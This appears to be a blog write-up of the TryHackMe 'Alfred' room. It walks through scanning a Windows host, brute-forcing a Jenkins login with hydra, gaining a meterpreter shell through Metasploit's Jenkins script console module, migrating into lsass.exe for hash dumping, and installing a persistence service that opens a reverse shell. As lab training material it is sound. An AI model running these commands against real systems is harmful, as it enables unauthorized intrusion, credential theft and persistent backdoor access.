Post

Alfred - Easy THM

Posted Updated
By TFA 1 min read
  • OS: windows
  • Difficulty: easy
  • Author: talace

Scanning ๐Ÿ‘€

threader3000.py

1
2
3
4
5

python3 threader3000.py

Port 80 is open
Port 3389 is open
Port 8080 is open

Nmap scan

1
2
3
4
5
6
7

nmap -p80,3389,8080 -sV -sC -T4 -Pn -oA 10.10.18.104 10.10.18.104

PORT     STATE SERVICE            VERSION
80/tcp   open  http               Microsoft IIS httpd 7.5
3389/tcp open  ssl/ms-wbt-server?
|   Target_Name: ALFRED
8080/tcp open  http               Jetty 9.4.z-SNAPSHOT

Enumeration ๐Ÿค–

Jenkins enumeration

use hydra to brute force login

1
2
3

hydra -s 8080 -L $userfile -P $passfile $target_ip http-post-form '/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in:Invalid username or password' -f -o rockyou.txt

FOUND: admin:admin

Exploit โš’๏ธ

Exploit with metasploit

1
2
3
4
5
6
7
8
9
10
11

use exploit/multi/http/jenkins_script_console

set LHOST 10.8.x.x
set TARGETURI /
set RPORT 8080
set RHOSTS 10.10.x.x
set username admin
set password admin
run

meterpreter >

Now that we have a session open, letโ€™s elevate our privileges!

Privilege escalation ๐Ÿ‘บ

Switch process for more stable meterpreter stable, because my process was on x86 and i need on x64.

Iโ€™m using lsaas.exe process, so i will be able to dump hash and do more actions for my post-exploit

1
2
3

ps 

676   580   lsass.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\lsass.exe

Migrate to it

1

meterpreter > migrate 676

Now that we have a stable meterpreter..

Letโ€™s retrieve user.txt ๐Ÿค 

1
2
3
4
5

meterpreter > search -f user.txt

Path                             Size (bytes)  Modified (UTC)
----                             ------------  --------------
c:\Users\bruce\Desktop\user.txt  32            2019-10-25 18:22:36 -0400

Now root.txt! ๐Ÿ˜ผ

1
2
3
4
5

meterpreter > search -f root.txt

Path                                 Size (bytes)  Modified (UTC)
----                                 ------------  --------------
c:\Windows\System32\config\root.txt  70            2019-10-26 07:36:00 -0400

Post-exploitation ๐Ÿผ

Use local persistance module from Metasploit

Creating a new services in windows that will send a revershell

1
2
3
4
5

use exploit/windows/local/persistence_service
set payload windows/meterpreter/reverse_tcp
set lport <lport>
set lhost <lhost>
set session <id>

Resources ๐Ÿ“’

Article: metasploit-module-for-persistence

writeup, TryHackMe
Command injection
This post is licensed under CC BY 4.0 by the author.